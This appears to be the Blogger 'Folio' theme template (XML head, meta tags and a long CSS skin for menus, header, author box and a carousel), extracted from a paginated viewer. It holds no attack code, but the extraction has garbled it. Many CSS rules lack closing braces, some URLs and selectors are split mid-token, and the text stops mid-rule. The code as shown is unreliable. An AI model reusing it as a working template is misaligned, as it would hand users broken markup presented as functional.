You are on page 1of 264

<?xml version="1.0" encoding="UTF-8" ?

>

<!DOCTYPE html>

<html b:version='2' class='v2' expr:dir='data:blog.languageDirection'


xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b'
xmlns:data='http://www.google.com/2005/gml/data'
xmlns:expr='http://www.google.com/2005/gml/expr'>

<head>

<meta content='width=device-width, initial-scale=1, maximum-scale=1' name='viewport'/>

<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js'
type='text/javascript'/>

<link href='http://fonts.googleapis.com/css?family=Rubik:400,400i,500,500i,700,700i' media='all'


rel='stylesheet' type='text/css'/>

<link href='//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css'
rel='stylesheet'/>

<link href='//cdn.linearicons.com/free/1.0.0/icon-font.min.css' rel='stylesheet'/>

<b:include data='blog' name='all-head-content'/>

<title>

<b:if cond='data:blog.pageType == &quot;index&quot;'>

<data:blog.pageTitle/>

<b:else/>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<data:blog.pageName/> - <data:blog.title/>

<b:else/>

ERROR 404 - <data:blog.title/>

</b:if>

</b:if>

</title>

<!-- Description and Keywords (start) -->

<b:if cond='data:blog.pageType == &quot;index&quot;'>

<meta content='YOUR DESCRIPTION HERE' name='description'/>

</b:if>

<meta content='YOUR KEYWORDS HERE' name='keywords'/>


<!-- Description and Keywords (end) -->

<b:if cond='data:blog.pageType == &quot;item&quot;'>

<meta expr:content='data:blog.pageName' property='og:title'/>

<meta expr:content='data:blog.canonicalUrl' property='og:url'/>

<meta content='article' property='og:type'/>

</b:if>

<b:if cond='data:blog.postImageUrl'>

<meta expr:content='data:blog.postImageUrl' property='og:image'/>

<b:else/>

<b:if cond='data:blog.postImageThumbnailUrl'>

<meta expr:content='data:blog.postImageThumbnailUrl' property='og:image'/>

</b:if></b:if>

<b:if cond='data:blog.metaDescription != &quot;&quot;'>

<meta expr:content='data:blog.metaDescription' name='og:description'/>

</b:if>

<meta expr:content='data:blog.title' property='og:site_name'/>

<meta expr:content='data:blog.homepageUrl' name='twitter:domain'/>

<meta expr:content='data:blog.pageName' name='twitter:title'/>

<b:if cond='data:blog.postImageUrl'>

<meta content='summary_large_image' name='twitter:card'/>

<meta expr:content='data:blog.postImageUrl' name='twitter:image'/>

<b:else/>

<meta content='summary' name='twitter:card'/>

<b:if cond='data:blog.postImageThumbnailUrl'>

<meta expr:content='data:blog.postImageThumbnailUrl' name='twitter:image'/>

</b:if>

</b:if>

<meta expr:content='data:blog.pageName' name='twitter:title'/>

<b:if cond='data:blog.metaDescription'>

<meta expr:content='data:blog.metaDescription' name='twitter:description'/>

</b:if>
<!-- Social Media meta tag need customer customization -->

<meta content='Facebook App ID here' property='fb:app_id'/>

<meta content='Facebook Admin ID here' property='fb:admins'/>

<meta content='@username' name='twitter:site'/>

<meta content='@username' name='twitter:creator'/>

<b:skin><![CDATA[/*

-----------------------------------------------

Blogger Template Style

Name: Folio

Author : http://www.soratemplates.com

License: Free Version

----------------------------------------------- */

/* Variable definitions

-----------------------

<Group description="Main Hover Color" selector="body">

<Variable name="maincolor" description="Primary Color" type="color" default="#ffbd2f"


value="#ffbd2f"/>

</Group>

/*****************************************

reset.css

******************************************/

html, body, .section, .widget, div, span, applet, object, iframe,

h1, h2, h3, h4, h5, h6, p, blockquote, pre,

a, abbr, acronym, address, big, cite, code,

del, dfn, em, font, img, ins, kbd, q, s, samp,

small, strike, strong, sub, sup, tt, var,

dl, dt, dd, ol, ul, li,

fieldset, form, label, legend,

table, caption, tbody, tfoot, thead, tr, th, td, figure { margin: 0; padding: 0;}

html { overflow-x: hidden;}

a {text-decoration:none;color:#000;}
article,aside,details,figcaption,figure,

footer,header,hgroup,menu,nav,section { display:block;}

table { border-collapse: separate; border-spacing: 0;}

caption, th, td { text-align: left; font-weight: normal;}

blockquote:before, blockquote:after,

q:before, q:after { content: "";}

.quickedit, .home-link{display:none;}

blockquote, q { quotes: "" "";}

sup{ vertical-align: super; font-size:smaller;}

code{ font-family: 'Courier New', Courier, monospace; font-size:12px; color:#272727;}

::selection {background:transparent; text-shadow:#000 0 0 2px;}

::-moz-selection {background:$maincolor; text-shadow:#000 0 0 2px;}

::-webkit-selection {background:$maincolor; text-shadow:#000 0 0 2px;}

::-o-selection {background:$maincolor; text-shadow:#000 0 0 2px;}

a img{ border: none;}

ol, ul { padding:0; margin:0; text-align: left; }

ol li { list-style-type: decimal; padding:0 0 5px; }

ul li { list-style-type: disc; padding: 0 0 5px; }

ul ul, ol ol { padding: 0; }

#navbar-iframe, .navbar { height:0px; visibility:hidden; display:none }

.Attribution, .feed-links, .post-footer-line.post-footer-line-1, .post-footer-line.post-footer-line-2 ,


.post-footer-line.post-footer-line-3 {

display: none;

.item-control {

display: none !important;

h2.date-header, h4.date-header {display:none;margin:1.5em 0 .5em}

h1, h2, h3, h4, h5, h6 {

font-weight: 400;

color: #151515;
}

img {

max-width: 100%;

vertical-align: middle;

border: 0;

.widget iframe, .widget img {

max-width: 100%;

.status-msg-wrap {

display: none;

.preloader {

background: linear-gradient(90deg, #ff4e50 10%, #f9d423 90%);

position: fixed;

z-index: 1800;

top: 0;

right: 0;

bottom: 0;

left: 0;

width: 100%;

height: 100%;

.loader {

height: 40px;

width: 40px;

position: absolute;

left: 50%;

margin-left: -20px;

top: 50%;

margin-top: -20px;
}

.loader:before, .loader:after {

content: "";

height: 40px;

width: 40px;

border: 8px solid rgba(255, 255, 255, 0.5);

border-radius: 10px;

position: absolute;

top: 0;

.loader:before {

-webkit-animation: animate 2s infinite linear;

animation: animate 2s infinite linear;

.loader:after {

-webkit-animation: animate2 2s infinite linear;

animation: animate2 2s infinite linear;

@-webkit-keyframes animate {

100% {

-webkit-transform: rotate(180deg) skew(360deg);

transform: rotate(180deg) skew(360deg);

@keyframes animate {

100% {

-webkit-transform: rotate(180deg) skew(360deg);

transform: rotate(180deg) skew(360deg);

}
}

@-webkit-keyframes animate2 {

100% {

-webkit-transform: rotate(-180deg) skew(-360deg);

transform: rotate(-180deg) skew(-360deg);

@keyframes animate2 {

100% {

-webkit-transform: rotate(-180deg) skew(-360deg);

transform: rotate(-180deg) skew(-360deg);

/*****************************************

Custom css starts

******************************************/

body {

color: #2e2e2e;

font-family: 'Rubik', sans-serif;

font-size: 14px;

font-weight: normal;

line-height: 21px;

background: #ffffff;

/* ######## Wrapper Css ######################### */

#outer-wrapper{max-width:100%;margin:0 auto;background-color:#FFF;box-shadow:0 0 5px


RGBA(0, 0, 0, 0.2)}

.row{width:1170px}

#content-wrapper {

margin: 0 auto;
padding: 20px 0 30px;

overflow: hidden;

.item #main-wrapper, .statc_page #main-wrapper {

float: left;

width: 68%;

max-width: 800px;

.index #main-wrapper, .archive #main-wrapper {

float:none;

width:100%;

max-width:100%

.item #sidebar-wrapper, .statc_page #sidebar-wrapper {

float: right;

width: 30%;

max-width: 330px;

.index #sidebar-wrapper, .archive #sidebar-wrapper {

display:none;

visibility:hidden;

height:0;

opacity:0;

/* ######## Scrolling Navigation Menu Css ######################### */

.scroll-header {

z-index: 9;

position: absolute;

top: 0;

left: 0;
width: 100%;

padding: 10px 0px;

transition: all .5s;

.item .scroll-header, .static_page .scroll-header, .error_page .scroll-header {

position: static;

display: flex;

background: #f5f5f5 none repeat scroll top left;

box-shadow: 0 0 6px 1px rgba(0,0,0,0.1);

padding: 20px 0;

.scroll-header.scrolled-header {

background-color: rgba(30, 30, 30, 0.85);

border-bottom: 1px solid #262626;

position: fixed;

top: 0;

left: 0;

right: 0;

visibility:visible;

display:block;

transition: all .5s;

.scroll-head-wrap {

margin:0 auto;

.item .scroll-header h1, .static_page .scroll-header h1, .error_page .scroll-header h1 {

display: block!important;

color:#000!important;

.item .scroll-header #header img, .static_page .scroll-header #header img, .error_page .scroll-header
#header img {
display: none!important;

.item .scroll-header.scrolled-header h1, .static_page .scroll-header.scrolled-header h1, .error_page


.scroll-header.scrolled-header h1 {

display: none!important;

color:#000!important;

.item .scroll-header.scrolled-header #header img, .static_page .scroll-header.scrolled-header


#header img, .error_page .scroll-header.scrolled-header #header img {

display: block!important;

.scrollin-logo {

float: left;

margin: 0;

padding: 0;

display: inline-block;

.scrollin-logo .logo-title {

font-size: 40px;

font-weight: bold;

padding: 10px 17px;

display: block;

color:#fff;

.scrolling-menu {

float: right;

display: inline-block;

width: auto;

.scrolling-menu #nav {

list-style: none;

margin: 0;
padding: 0;

z-index: 999;

.scrolling-menu #nav li {

display: inline-block;

float: left;

line-height: 1;

list-style: none outside none;

padding: 16px 17px;

text-align: left;

.scrolling-menu #nav li a {

background: transparent;

color: #fff;

display: block;

font-size: 15px;

padding: 0 0 8px;

position: relative;

text-decoration: none;

text-transform: uppercase;

font-weight: bold;

letter-spacing: 1.3px;

.scrolling-menu #nav li a:hover {

color: $maincolor;

.scrolling-menu #nav li.current a {

color: $maincolor;

.scrolling-menu #nav li.current a:before {

position: absolute;
bottom: 0;

left: 0;

width: 100%;

opacity: 1;

height: 1px;

content: '';

-webkit-transition: all ease .3s;

transition: all ease .3s;

background: $maincolor;

/* ######## Navigation Menu Css ######################### */

.slicknav_menu {

display:none;

.tm-menu .slicknav_menu {

right:0;

display:none;

.scrolling-menu .slicknav_menu {

right:0;

.slicknav_menu {

padding:0 10px;

position: absolute;

z-index: 9;

.slicknav_menu .slicknav_icon-bar {

background-color: #343434;

}
.index .slicknav_menu .slicknav_icon-bar {

background-color: #fff;

.slicknav_nav a{

padding:5px 10px;

margin:2px 5px;

text-decoration:none;

color:#000;

font-size:11px;

font-weight:400;

letter-spacing:2px;

text-transform:uppercase;

/*

Mobile Menu Core Style

*/

.slicknav_btn { position: relative; display: block; vertical-align: middle; float: right; line-height: 27px;
cursor: pointer; height:27px;}

.slicknav_menu .slicknav_menutxt { display: block; line-height: 1.188em; float: left; }

.slicknav_menu .slicknav_icon { float: left; margin: 0.188em 0 0 0.438em; }

.slicknav_menu .slicknav_no-text { margin: 0 }

.slicknav_menu .slicknav_icon-bar { display: block; width: 1.125em; height: 0.125em; }

.slicknav_btn .slicknav_icon-bar + .slicknav_icon-bar { margin-top: 0.188em }

.slicknav_nav { clear: both }

.slicknav_nav ul,

.slicknav_nav li { display: block }

.slicknav_nav .slicknav_arrow { font-size: 0.8em; margin: 0 0 0 0.4em; }

.slicknav_nav .slicknav_item { cursor: pointer; }

.slicknav_nav .slicknav_row { display: block; }

.slicknav_nav a { display: block }


.slicknav_nav .slicknav_item a,

.slicknav_nav .slicknav_parent-link a { display: inline }

.slicknav_menu:before,

.slicknav_menu:after { content: " "; display: table; }

.slicknav_menu:after { clear: both }

.scroll-header.scrolled-header .slicknav_btn {color:#fff;}

.scroll-header.scrolled-header .slicknav_menu .slicknav_icon-bar {

background-color: #fff;

/* IE6/7 support */

.slicknav_menu { *zoom: 1 }

/*

User Default Style

Change the following styles to modify the appearance of the menu.

*/

.slicknav_menu {

font-size:16px;

/* Button */

.slicknav_btn {

margin: 5px 5px 6px;

text-decoration:none;

text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);

-webkit-border-radius: 4px;

-moz-border-radius: 4px;

border-radius: 4px;

/* Button Text */
.slicknav_menu .slicknav_menutxt {

color: #FFF;

font-weight: bold;

text-shadow: 0 1px 3px #000;

/* Button Lines */

.slicknav_nav {

color:#fff;

margin:0;

padding:0;

font-size:0.875em;

background: #fff;

.slicknav_nav, .slicknav_nav ul {

list-style: none;

overflow:hidden;

.slicknav_nav ul {

padding:0;

margin:8px 0 0 20px;

.slicknav_nav .slicknav_row {

padding:5px 10px;

margin:2px 5px;

.slicknav_nav .slicknav_item a,

.slicknav_nav .slicknav_parent-link a {
padding:0;

margin:0;

.slicknav_nav .slicknav_row:hover {

.slicknav_nav a:hover{

color: $maincolor;

.slicknav_nav .slicknav_txtnode {

margin-left:15px;

.slicknav_menu .slicknav_no-text {

margin-top:15px;

.tm-menu {

font-weight: 400;

margin: 0;

height:60px;

text-align:center;

float: right;

display:none;

width: auto;

.item .tm-menu, .static_page .tm-menu, .error_page .tm-menu {

display: inline-block;

ul#nav1 {

list-style: none;

margin: 0;
padding: 0;

text-align: center;

#menu .widget {

display: none;

#menu {

height: 60px;

position: relative;

text-align: center;

z-index: 15;

margin:0 auto;

.menu-wrap {

margin:0 auto;

position: relative;

#menu ul > li {

position: relative;

vertical-align: middle;

display: inline-block;

padding: 0;

margin: 0;

#menu ul > li:hover > a {

color: $maincolor

.index #menu ul > li > a {

color:#fff;

#menu ul > li > a {


color: #000;

font-size: 14px;

line-height: 60px;

display: inline-block;

text-transform: uppercase;

text-decoration: none;

letter-spacing: 1px;

margin: 0;

padding: 0 12px;

.scroll-header.scrolled-header #menu ul > li > a, .scroll-header.scrolled-header #header h1 a {

color:#fff;

.scroll-header.scrolled-header #menu ul > li > ul > li > a {

color:#000;

#menu ul > li:first-child > a {

padding-left: 0;

#menu ul > li > ul > li:first-child > a:before, #menu ul > li > ul > li > ul > li:first-child > a:before {

display:none;

#menu ul > li > ul > li:first-child > a {

padding-left: 12px

#menu ul > li > ul {

position: absolute;

background: #fff;

-webkit-box-shadow: 0 7px 7px rgba(0, 0, 0, 0.15);

-moz-box-shadow: 0 7px 7px rgba(0, 0, 0, 0.15);


box-shadow: 0 7px 7px rgba(0, 0, 0, 0.15);

top: 100%;

left: 0;

min-width: 180px;

padding: 0;

z-index: 99;

margin-top: 0;

visibility: hidden;

opacity: 0;

webkit-transform: translate3d(-11px, 0, 0);

transform: translate3d(-11px, 0, 0);

-webkit-animation-duration: .5s;

animation-duration: .5s;

#menu ul > li > ul > li > ul {

position: absolute;

top: 0;

left: 180px;

width: 180px;

background: #fff;

z-index: 99;

margin-top: 0;

margin-left: 0;

padding: 0;

border-left: 1px solid #e5e5e5;

visibility: hidden;

opacity: 0;

-webkit-transform: translateY(10px);

-moz-transform: translateY(10px);

transform: translateY(10px)

}
#menu ul > li > ul > li {

display: block;

float: none;

text-align: left;

position: relative;

border-bottom: 1px solid;

border-top: none;

border-color: #e5e5e5;

#menu ul > li > ul > li:hover {

background-color: rgba(255, 255, 255, 0.03)

#menu ul > li > ul > li a {

font-size: 11px;

display: block;

color: #000;

line-height: 35px;

text-transform: uppercase;

text-decoration: none;

margin: 0;

padding: 0 12px;

border-right: 0;

border: 0

.index #menu ul > li > ul > li a {

color:#000;

#menu ul > li.parent > a:after {

content: '\f107';

font-family: FontAwesome;

float: right;
margin-left: 5px

#menu ul > li:hover > ul,

#menu ul > li > ul > li:hover > ul {

opacity: 1;

visibility: visible;

-webkit-transform: translateY(0);

-moz-transform: translateY(0);

transform: translateY(0)

#menu ul > li > ul > li.parent > a:after {

content: '\f105';

float: right

#menu ul ul {

/* ######## Header Css ######################### */

.index #header-wrapper .svg, .archive #header-wrapper .svg {

position: absolute;

bottom: -5px;

left: 0;

width: 100%;

z-index: 2;

.index #header-wrapper .svg svg, .archive #header-wrapper .svg svg {

fill: #fff;

width: 101%;

}
#header-wrapper {

text-align: center;

padding:0;

background: url(https://4.bp.blogspot.com/-
UQx5MUK3DRs/W4akx3E8z4I/AAAAAAAAFig/jzyEvTZpbSQh1JfVYgtb3H8t29KIhLJEwCK4BGAYYCw/s1
600/head-back.jpg) no-repeat center bottom;

background-attachment: fixed;

background-size: cover;

margin-bottom: 10px;

height:100vh;

box-sizing:border-box;

position:relative;

width: 100%;

.index #header-wrapper {

margin-bottom:0;

.item .header-logo-desc p, .static_page .header-logo-desc p, .error_page .header-logo-desc p,


.item .top-bar-social #social a, .static_page .top-bar-social #social a, .error_page .top-bar-social
#social a {

color:#303030;

.item #header-wrapper, .static_page #header-wrapper, .error_page #header-wrapper {

background: #fff;

height: auto;

border-bottom: 1px solid #eee;

box-shadow: 0 -2px 19px rgba(0,0,0,.1);

padding-bottom: 15px;

.item #header-wrapper:before, .static_page #header-wrapper:before, .error_page #header-


wrapper:before {

display:none;
}

#header-wrapper:before {

content:"";

position: absolute;

top: 0;

left: 0;

width: 100%;

height: 100%;

opacity: .5;

background: #000;

#header {

padding: 0;

#header-inner {

text-align: center;

display: inline-block;

#header h1 {

color: #fff;

margin: 0;

font-size: 40px;

line-height: 1.4em;

text-transform: Uppercase;

letter-spacing: 1px;

#header .description {

display:none;

.header-text p {
color: #fff;

margin: 0;

font-size: 20px;

letter-spacing: 2px;

font-weight: 500;

line-height: 1.2;

.header-logo-desc .type {

font-size: 60px;

font-weight: 700;

font-family: inherit;

word-spacing: 2px;

letter-spacing: 2px;

color: #fff;

.header-logo-desc p {

display: inline-block;

white-space: nowrap;

visibility: inherit;

transition: none;

border-width: 0px;

margin: 0 0 0 20px;

padding-right: 20px;

min-height: 0px;

min-width: 0px;

max-height: none;

max-width: none;

opacity: 1;

transform: matrix3d(1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1);

transform-origin: 50% 50% 0px;

}
.header-logo-desc {

margin:10px 0 20px;

.header-logo-desc .type {

position: relative;

.typed-cursor {

font-weight: 500;

font-size: 50px;

color: #aebcb9;

opacity: 1;

-webkit-animation: blink 1s infinite;

-moz-animation: blink 1s infinite;

animation: blink 1s infinite;

.typed-cursor {

position: absolute;

bottom: 0;

display: inline-block;

.fenix-head {

display:table;

width:100%;

height:100%;

.fenix-sub-head {

margin:0 auto;

display:table-cell;

vertical-align: middle;

}
.index .fenix-sub-head, .archive .fenix-sub-head {

.top-bar-social {

padding: 0;

.top-bar-social li {

display: inline-block;

float: none;

padding: 0;

margin-right: 5px;

.top-bar-social li:last-child {

margin-right:0;

.top-bar-social .widget ul {

padding: 0;

.top-bar-social .LinkList ul {

text-align: center;

margin: 0 0 0 0;

.top-bar-social #social a {

display: block;

width: 30px;

height: 30px;

line-height: 30px;

font-size: 15px;

color: #000;

background: #fff;

-webkit-border-radius: 3px;
-moz-border-radius: 3px;

border-radius: 3px;

transition: background 0.3s linear;

-moz-transition: background 0.3s linear;

-webkit-transition: background 0.3s linear;

-o-transition: background 0.3s linear;

.top-bar-social #social a:before {

display: inline-block;

font: normal normal normal 22px/1 FontAwesome;

font-size: inherit;

font-style: normal;

font-weight: 400;

-webkit-font-smoothing: antialiased;

-moz-osx-font-smoothing: grayscale;

.top-bar-social .bloglovin:before{content:"\f004"}

.top-bar-social .facebook:before{content:"\f09a"}

.top-bar-social .twitter:before{content:"\f099"}

.top-bar-social .gplus:before{content:"\f0d5"}

.top-bar-social .rss:before{content:"\f09e"}

.top-bar-social .youtube:before{content:"\f167"}

.top-bar-social .skype:before{content:"\f17e"}

.top-bar-social .stumbleupon:before{content:"\f1a4"}

.top-bar-social .tumblr:before{content:"\f173"}

.top-bar-social .vine:before{content:"\f1ca"}

.top-bar-social .stack-overflow:before{content:"\f16c"}

.top-bar-social .linkedin:before{content:"\f0e1"}

.top-bar-social .dribbble:before{content:"\f17d"}

.top-bar-social .soundcloud:before{content:"\f1be"}

.top-bar-social .behance:before{content:"\f1b4"}
.top-bar-social .digg:before{content:"\f1a6"}

.top-bar-social .instagram:before{content:"\f16d"}

.top-bar-social .pinterest:before{content:"\f0d2"}

.top-bar-social .delicious:before{content:"\f1a5"}

.top-bar-social .codepen:before{content:"\f1cb"}

.top-bar-social ul#social a:hover {

color: $maincolor;

opacity: 1;

.slide-in {

font-size: 3.3rem;

position: absolute;

bottom: 7.2rem;

left: 0;

display: block;

width: 100%;

margin: 0;

padding: 0

.slide-in .pointer {

position: absolute;

top: 50%;

left: 50%;

width: 26px;

height: 42px;

-webkit-transform: translate(-50%, -50%);

-ms-transform: translate(-50%, -50%);

transform: translate(-50%, -50%);

border: 2px solid #fff;

border-radius: 26px;
-webkit-backface-visibility: hidden

.slide-in .pointer:after {

position: absolute;

top: 5px;

left: 50%;

width: 4px;

height: 4px;

margin-left: -2px;

content: '';

-webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0);

transform: translateY(0) scaleY(1) scaleX(1) translateZ(0);

-webkit-animation: scroll 1.5s -1s cubic-bezier(.68, -.55, .265, 1.55) infinite;

animation: scroll 1.5s -1s cubic-bezier(.68, -.55, .265, 1.55) infinite;

opacity: 1;

border-radius: 100%;

background-color: #fff

@-webkit-keyframes scroll {

0%, 20% {

-webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0);

transform: translateY(0) scaleY(1) scaleX(1) translateZ(0)

10% {

-webkit-transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0);

transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0);

opacity: 1

to {

-webkit-transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0);

transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0);


opacity: .01

@keyframes scroll {

0%, 20% {

-webkit-transform: translateY(0) scaleY(1) scaleX(1) translateZ(0);

transform: translateY(0) scaleY(1) scaleX(1) translateZ(0)

10% {

-webkit-transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0);

transform: translateY(0) scaleY(1.2) scaleX(1.2) translateZ(0);

opacity: 1

to {

-webkit-transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0);

transform: translateY(20px) scaleY(2.5) scaleX(.5) translateZ(0);

opacity: .01

@-webkit-keyframes blink {

0%, to {

opacity: 1

50% {

opacity: 0

@keyframes blink {

0%, to {

opacity: 1

}
50% {

opacity: 0

/* ######## Section 1 Css ######################### */

.sora-special-box {

background: #fff;

overflow: hidden;

margin: 0 auto;

padding:20px 0;

.special-wrap {

margin:0 auto;

.special-title {

text-align: center;

margin-bottom: 35px;

.special-title h4 {

font-size: 35px;

line-height: 45px;

color:#303030;

text-transform:capitalize;

.special-tiles {

width: 33.33%;

box-sizing: border-box;

float: left;

padding: 10px;

box-sizing: border-box;

}
.special-tiles-wrap {

background: #FFF;

box-sizing: border-box;

border-radius: 5px;

padding: 30px 30px 20px;

box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);

-webkit-box-shadow: 5px 5px 55px -27px rgba(0,0,0,0.5);

-moz-box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);

.special-icons {

font-size: 45px;

float: left;

color: #303030;

margin-right: 10px;

width: 50px;

height: 60px;

line-height: 60px;

.special-heading {

font-size: 14px;

line-height: 21px;

color: #303030;

text-transform: capitalize;

letter-spacing: 1.5px;

margin-bottom: 10px;

font-weight:bold;

.special-text {

color: #606060;

}
.sora-author-box {

padding: 57px 50px 15px 50px;

box-sizing: border-box;

overflow: hidden;

.sora-author-box-image {

width:40%;

float: left;

margin-right: 5%;

margin-bottom: 10px;

.sora-author-box-image img {

height: 385px;

object-fit: cover;

.sora-author-box-text {

padding: 0;

overflow: hidden;

text-align: left;

.sora-author-box-text-head {

color: #3d4451;

padding-bottom: 25px;

margin-bottom: 25px;

border-bottom: 1px solid #dedede;

.sora-author-box-text .hello-txt {

background-color: $maincolor;

color: #fff;

font-size: 14px;

font-weight: 700;
line-height: 1.1;

display: inline-block;

padding: 7px 12px;

text-transform: uppercase;

position: relative;

margin-bottom: 28px;

.sora-author-box-text .hello-txt:before {

border-left-color:$maincolor;

content: '';

width: 0;

height: 0;

top: 100%;

left: 5px;

display: block;

position: absolute;

border-style: solid;

border-width: 0 0 8px 8px;

.sora-author-box-text .profile-title {

font-size: 36px;

line-height: 1.1;

font-weight: 700;

margin-bottom: 5px;

color:#3d4451;

.sora-author-box-text .profile-title span {

font-weight: 300;

.sora-author-box-text .profile-position {

font-size: 18px;
font-weight: 400;

line-height: 1.1;

margin-bottom: 0;

.sora-author-box-text-details p {

font-size: 14px;

font-weight: 300;

color: #8a8a8a;

line-height: 2;

margin: 0;

.sora-author-box-text-details ul {

margin: 0;

padding: 0;

list-style: none;

.sora-author-box-text-details .profile-list li {

margin-bottom: 13px;

list-style: none;

padding:0;

.sora-author-box-text-details .profile-list li .list-title {

display: block;

width: 120px;

float: left;

color: #333333;

font-size: 12px;

font-weight: 700;

line-height: 20px;

text-transform: uppercase;

}
.sora-author-box-text-details .profile-list li .cont {

display: block;

margin-left: 125px;

font-size: 15px;

font-weight: 400;

line-height: 20px;

color: #9da0a7;

.sora-author-box-text-details .profile-list li .list-button {

color: #fff;

font-size: 12px;

font-weight: 700;

line-height: 1;

text-transform: none;

padding: 5px 8px;

display: inline-block;

position: relative;

top: -2px;

-webkit-border-radius: 3px;

-moz-border-radius: 3px;

border-radius: 3px;

background:$maincolor;

.sora-author-box-text-details .profile-list li .fa {

margin-right: 10px;

vertical-align: baseline;

.fenix-head {

.hero-row {
width:940px;

.fenix-sub-head-auth {

margin:0 auto;

background: #fff;

position: relative;

.sora-cv-author-details {

margin: 15px auto;

position: relative;

-webkit-box-sizing: border-box;

-moz-box-sizing: border-box;

box-sizing: border-box;

background-color: #fff;

transition: box-shadow .25s;

-webkit-transition: box-shadow .25s;

box-shadow: 0 2px 5px 0 rgba(0, 0, 0, .16), 0 2px 10px 0 rgba(0, 0, 0, .12);

.sora-cv-author-details .card-content {

padding: 40px;

-webkit-box-sizing: border-box;

-moz-box-sizing: border-box;

box-sizing: border-box;

.sora-cv-author-details .card-content p {

color: #000;

font-size: 18px;

font-weight: 300;

line-height: 1.8;

text-align: center;

}
.sora-cv-author-details .card-action {

border-top: 1px solid rgba(160, 160, 160, .2);

padding: 20px;

-webkit-box-sizing: border-box;

-moz-box-sizing: border-box;

box-sizing: border-box;

.sora-cv-author-details .card-action .about-btn {

height: auto;

margin-right: auto;

margin-left: auto;

animation-delay: 1s;

text-align: center;

.sora-cv-author-details .card-action .about-btn .btn {

margin: 7px 7px;

background: $maincolor;

color: #fff;

width: 180px;

border-radius: 2px;

display: inline-block;

padding: 6px 12px;

font-size: 14px;

font-weight: 400;

line-height: 1.42857143;

text-align: center;

white-space: nowrap;

vertical-align: middle;

-ms-touch-action: manipulation;

touch-action: manipulation;

cursor: pointer;
-webkit-user-select: none;

-moz-user-select: none;

-ms-user-select: none;

user-select: none;

position: relative;

overflow: hidden;

z-index: 1;

will-change: opacity, transform;

transition: all .3s ease-out;

box-shadow: 0 2px 5px 0 rgba(0, 0, 0, .16), 0 2px 10px 0 rgba(0, 0, 0, .12);

.skills, .skill-details {

padding: 15px;

width: 50%;

float: left;

box-sizing: border-box;

padding-right: 40px;

padding-left: 0;

.skill-details {

float:right;

padding-left: 40px;

padding-right: 0;

.skills dt:after {

width: 100%;

background-color: #e0e0e0;

height: 0.5rem;

content: "";

display: block;

}
.skills dd {

background: red;

width: 0;

height: 0.5rem;

position: relative;

top: -0.5rem;

.skills dd.html {

background: #F44336;

.skills dd.css {

background: #2196F3;

.skills dd.jquery {

background: #FFCA28;

.skills dd.scss {

background: #F06292;

.skills dd.javascript {

background: #FFA000;

.skills dd.php {

background: #303F9F;

.skills dd.xml {

background: #27ae60;

/* ######## Section 2 Css ######################### */

.sora-works-box {
background: #f1f1f1;

background-size: cover;

overflow: hidden;

margin: 0 auto;

padding:20px 0;

.works-wrap {

margin:0 auto;

.works-title {

text-align: center;

margin-bottom: 35px;

.works-title h4 {

font-size: 35px;

line-height: 45px;

color:#202020;

text-transform:capitalize;

.works-title span {

color:#aaa;

.works-tiles {

width: 25%;

float: left;

padding: 10px;

box-sizing: border-box;

text-align: center;

.works-icons {

font-size: 45px;
display: block;

color: $maincolor;

margin-bottom: 20px;

.works-icons li {

width:60px;

height:60px;

background-color: $maincolor;

border-radius: 50%;

position: relative;

display: inline-block;

padding: 10px;

list-style:none;

-webkit-box-shadow: 0 15px 34px rgba(0, 0, 0, 0.18);

-moz-box-shadow: 0 15px 34px rgba(0, 0, 0, 0.18);

box-shadow: 0 15px 34px rgba(0, 0, 0, 0.18);

-webkit-transition: all 0.4s ease-in-out;

.works-icons li .text {

line-height: 60px;

font-size: 25px;

color:#fff;

.works-heading {

font-size: 18px;

line-height: 21px;

color: #202020;

text-transform: capitalize;

letter-spacing: 1.5px;

margin-bottom: 10px;
font-weight:bold;

.works-text {

margin: 0 0 20px;

color: #707070;

/* ######## Testimonial Css ######################### */

/*! Flickity v1.0.0

http://flickity.metafizzy.co

---------------------------------------------- */

.flickity-enabled{position:relative}.flickity-enabled:focus{outline:0}.flickity-
viewport{overflow:hidden;position:relative;height:100%}.flickity-
slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-user-
select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-
draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-
draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-prev-
next-button{position:absolute;top:50%;width:44px;height:44px;border:none;border-
radius:50%;background:#fff;background:hsla(0,0%,100%,.75);cursor:pointer;-webkit-
transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%)}.flickity-
prev-next-button:hover{background:#fff}.flickity-prev-next-button:focus{outline:0;box-shadow:0 0 0
5px #09F}.flickity-prev-next-button:active{filter:alpha(opacity=60);opacity:.6}.flickity-prev-next-
button.previous{left:10px}.flickity-prev-next-button.next{right:10px}.flickity-rtl .flickity-prev-next-
button.previous{left:auto;right:10px}.flickity-rtl .flickity-prev-next-
button.next{right:auto;left:10px}.flickity-prev-next-
button:disabled{filter:alpha(opacity=30);opacity:.3;cursor:auto}.flickity-prev-next-button
svg{position:absolute;left:20%;top:20%;width:60%;height:60%}.flickity-prev-next-button
.arrow{fill:#333}.flickity-prev-next-button.no-svg{color:#333;font-size:26px}.flickity-page-
dots{position:absolute;width:100%;bottom:-25px;padding:0;margin:0;list-style:none;text-
align:center;line-height:1}.flickity-rtl .flickity-page-dots{direction:rtl}.flickity-page-dots
.dot{display:inline-block;width:10px;height:10px;margin:0 8px;background:#efefef;border-
